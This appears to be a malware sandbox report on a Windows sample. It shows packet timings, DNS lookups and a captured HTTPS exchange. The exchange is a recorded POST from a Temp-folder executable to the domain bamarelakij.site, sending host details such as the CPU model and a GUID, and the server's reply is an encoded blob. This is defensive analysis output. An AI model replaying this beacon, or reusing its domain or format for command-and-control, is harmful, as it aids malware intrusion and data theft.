                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.994765043 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.995109081 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.995109081 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.995146036 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.006514072 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.107508898 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.116417885 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.116576910 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.116590023 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.118906975 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.124744892 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.228117943 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.230870962 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.230895042 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.230906963 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.231272936 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.241641998 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.290436983 CET44356116184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.320388079 CET56116443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.340395927 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.347443104 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.347455978 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.347465038 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.350217104 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.373363972 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.472239017 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.479171991 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.479269028 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.479283094 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.479295015 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.479846001 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.518595934 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:04.628485918 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:05.099298954 CET44356116184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:05.137835979 CET56116443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:14.290102959 CET44356116184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:38.692318916 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:38.692442894 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:38.692639112 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:38.692713976 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.140677929 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.141566038 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.174262047 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237339973 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237474918 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237485886 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237495899 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237776041 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.237848043 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.333643913 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.334070921 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.430721998 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.431360960 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.431387901 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:39.431746960 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.722738981 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.722856045 CET53095443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.888048887 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.889564991 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.889698982 CET44353095162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:41.889909029 CET53095443192.168.2.8162.159.61.3

                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.762111902 CET192.168.2.81.1.1.10xd416Standard query (0)bamarelakij.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.755166054 CET192.168.2.81.1.1.10xa9a8Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.755510092 CET192.168.2.81.1.1.10x1151Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:38.686942101 CET192.168.2.81.1.1.10xd507Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:38.687102079 CET192.168.2.81.1.1.10xe014Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.138350010 CET192.168.2.81.1.1.10x47c2Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.138448954 CET192.168.2.81.1.1.10x18c4Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.158176899 CET192.168.2.81.1.1.10x8824Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.158294916 CET192.168.2.81.1.1.10xc188Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.160234928 CET192.168.2.81.1.1.10xd79dStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.160612106 CET192.168.2.81.1.1.10x51b4Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.383848906 CET192.168.2.81.1.1.10xed58Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.383999109 CET192.168.2.81.1.1.10xebStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.679882050 CET192.168.2.81.1.1.10xe27aStandard query (0)assets2.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.680064917 CET192.168.2.81.1.1.10xbf7fStandard query (0)assets2.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.287301064 CET192.168.2.81.1.1.10xcccdStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.287509918 CET192.168.2.81.1.1.10x501Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.287801027 CET192.168.2.81.1.1.10xf226Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.287940979 CET192.168.2.81.1.1.10x33d2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.837644100 CET192.168.2.81.1.1.10x1cc9Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.837845087 CET192.168.2.81.1.1.10x6044Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.891383886 CET192.168.2.81.1.1.10x4b9Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.891519070 CET192.168.2.81.1.1.10x9b1cStandard query (0)clients2.googleusercontent.com65IN (0x0001)false

                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.775444984 CET1.1.1.1192.168.2.80xd416No error (0)bamarelakij.site104.21.80.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.775444984 CET1.1.1.1192.168.2.80xd416No error (0)bamarelakij.site172.67.174.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.762120962 CET1.1.1.1192.168.2.80x1151No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.762677908 CET1.1.1.1192.168.2.80xa9a8No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.764769077 CET1.1.1.1192.168.2.80x8606No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.764769077 CET1.1.1.1192.168.2.80x8606No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:37.765041113 CET1.1.1.1192.168.2.80x7cd4No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:38.693737984 CET1.1.1.1192.168.2.80xe014No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:38.694046021 CET1.1.1.1192.168.2.80xd507No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372519016 CET1.1.1.1192.168.2.80x8824No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372582912 CET1.1.1.1192.168.2.80xc188No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372956038 CET1.1.1.1192.168.2.80x51b4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.373445988 CET1.1.1.1192.168.2.80xd79dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.391046047 CET1.1.1.1192.168.2.80xebNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.391937017 CET1.1.1.1192.168.2.80xed58No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.687053919 CET1.1.1.1192.168.2.80xbf7fNo error (0)assets2.msn.comassets2.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.688744068 CET1.1.1.1192.168.2.80xe27aNo error (0)assets2.msn.comassets2.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.296997070 CET1.1.1.1192.168.2.80xcccdNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.296997070 CET1.1.1.1192.168.2.80xcccdNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297288895 CET1.1.1.1192.168.2.80x501No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297465086 CET1.1.1.1192.168.2.80x33d2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297774076 CET1.1.1.1192.168.2.80xf226No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297774076 CET1.1.1.1192.168.2.80xf226No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844307899 CET1.1.1.1192.168.2.80x1cc9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844307899 CET1.1.1.1192.168.2.80x1cc9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844578028 CET1.1.1.1192.168.2.80x6044No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898227930 CET1.1.1.1192.168.2.80x4b9No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898227930 CET1.1.1.1192.168.2.80x4b9No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898713112 CET1.1.1.1192.168.2.80x9b1cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                          • bamarelakij.site
                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                            • browser.events.data.msn.com
                                                                                                                                                                                                                                                                            • ntp.msn.com
                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                          • deff.nelreports.net

                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.849712104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC354OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 147
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC147OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 c1 60 aa cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd`$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC782INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:26 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SykusQEfpyxKf1Wi1Rc38mKNclh4YCQrWGy34oIpV0xQ0eKxr8i1EDTl%2FDA%2BozIWHEwnwlIfUvskB3I1sqwtEXB%2BGYBvHtdtmQjX1GXLccTRSXNrVpp%2Bfte5SrUSn0GOde0n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ecc9e9974289-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1574&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1137&delivery_rate=1790312&cwnd=150&unsent_bytes=0&cid=80d2aa18946620ef&ts=728&x=0"
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC587INData Raw: 33 32 66 32 0d 0a 00 00 00 00 1c 8a 00 00 f5 54 29 07 00 00 00 00 56 03 d4 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c d4 02 4e d4 89 08 0a 5c fb d8 5a 90 45 5b 4e d7 d0 6c 1d 03 f5 0b 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f5 0b 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 0d 03 09 0d 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 09 0d fd 57 7f 48 6c 7c b9 b1 17 ec 4c e4 d7 08 6d fa 67 0c 3b 02 15 00 0f 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 3b 02 57 06 36 49 41 a7 98 95 9c ca e8 ee de e4 d6 b8 86 de de d6 d2 ca e6 fb 06 90 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 90 02 48 34 d6 d3 2a f9 e3 d9 a7 07 a0 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 a0 09 ea 76 df 2c 89 bf ea 26 01 0b a2 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 a2
                                                                                                                                                                                                                                                                          Data Ascii: 32f2T)VlLN\ZE[NllW6IAlWHl|Lmg;l;W6IAl1H4*lv,&l
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: ee e6 ca e4 e6 e6 09 b9 0a 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b b9 0a 57 06 36 49 41 a7 98 95 e6 f2 e6 e8 ca da 5c c6 de dc cc 49 0c 5c 09 15 00 06 00 08 1f 0f 17 15 04 d9 6c 08 d9 40 5c 09 57 06 36 49 41 a7 98 95 e6 c6 e4 ca ca dc 4d 0f 1e 00 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 1e 00 57 06 36 49 41 a7 98 95 d8 de ce d2 dc e6 5c d4 e6 de dc 62 07 96 07 15 00 0a 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 96 07 57 06 36 49 41 a7 98 95 da e6 ca c8 ce ca 5c ca f0 ca 47 01 a8 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 a8 05 d2 18 2d 0e b1 d1 18 04 8c 0a f2 09 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f2 09 57 06 36 49 41 a7 98 95 86 aa a4 a4 8a 9c a8 5e 01 29 0e 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c 29 0e ea bd 05 65 3c 0c de 79 01 06
                                                                                                                                                                                                                                                                          Data Ascii: lW6IA\I\l@\W6IAMlW6IA\blW6IA\Gl-lW6IA^)lL)e<y
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 0f 01 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 28 0f 95 0d 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 95 0d 57 06 36 49 41 a7 98 95 d6 de e8 c2 e8 de ce e4 c2 da 5c ca f0 ca 34 02 65 0c 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 48 65 0c 75 9a f6 50 cf d7 92 ee 9f 21 c5 fc 74 a3 46 a5 81 01 2b 00 15 00 09 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 2b 00 57 06 36 49 41 a7 98 95 ea e6 ca e4 5c c6 de dc cc 01 0f 21 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b1 21 08 9f 4f 57 f3 fd 82 62 f9 29 01 b1 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 b1 0d 4d 55 5d 31 2f 7d 9d 3e 51 04 49 08 15 00 19 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 49 08 57 06 36 49 41 a7 98 95 8c d2 d8 ca b4 d2 d8 d8 c2 b8 e6
                                                                                                                                                                                                                                                                          Data Ascii: lW6IA(lW6IA\4elHeuP!tF+l+W6IA\!l!OWb)lMU]1/}>QIlHIW6IA
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 07 a5 4b 36 90 01 7a 2c df 4e f0 05 3c ba 0e f8 94 e0 0a a2 05 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 a2 05 57 06 36 49 41 a7 98 95 e0 c2 e6 e6 ee de e4 c8 e6 5c d4 e6 de dc f6 00 c8 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 0b c8 0b d1 7d 7d 88 b2 b4 48 82 89 04 8a 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 8a 06 fe 7d b4 10 9c 55 74 1f 47 04 31 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 31 02 cf f5 1e c7 6a d3 e7 3f 24 4e 2d 6b d1 a7 33 74 02 09 40 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 40 07 24 c1 f7 78 47 08 c2 72 4e 02 84 06 15 00 20 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 84 06 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6 86 a0 b8 92 dc d2 be 8c d2 d8 ca e6 b8 c2 e0 e0 88 c2 e8 c2 5c d2 dc d2 0c 00 81 0c 15 00 08 00 08 1f
                                                                                                                                                                                                                                                                          Data Ascii: K6z,N<lW6IA\l}}Hl}UtG1l1j?$N-k3t@l@$xGrN lHW6IA\
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 74 09 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 5c d2 dc d2 1d 0d 68 05 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 68 05 39 c4 cb 87 3e c5 44 8d d2 7f f8 2b 85 b1 90 c6 8c 04 e7 01 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 e7 01 b4 cf 7d 29 57 b8 cd 26 5f 74 4e 85 ec cc 19 6d 0e 00 6f 05 15 00 29 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 6f 05 57 06 36 49 41 a7 98 95 a6 de cc e8 ee c2 e4 ca b8 9a c2 e4 e8 d2 dc 40 a0 e4 d2 d6 e4 f2 d8 b8 ae d2 dc a6 86 a0 40 64 40 9e ec ca e4 e4 d2 c8 ca 6f 0b 9b 0d 15 00 12 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 9b 0d 57 06 36 49 41 a7 98 95 a6 ca c6 ea e4 ca 40 a0 e4 ca cc ca e4 ca dc c6 ca e6 52 06 37 08 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 37 08 57 06 36 49 41 a7 98 95 c6
                                                                                                                                                                                                                                                                          Data Ascii: ltW6IA\hlh9>D+l})W&_tNmo)lHoW6IA@@d@olW6IA@R7l7W6IA
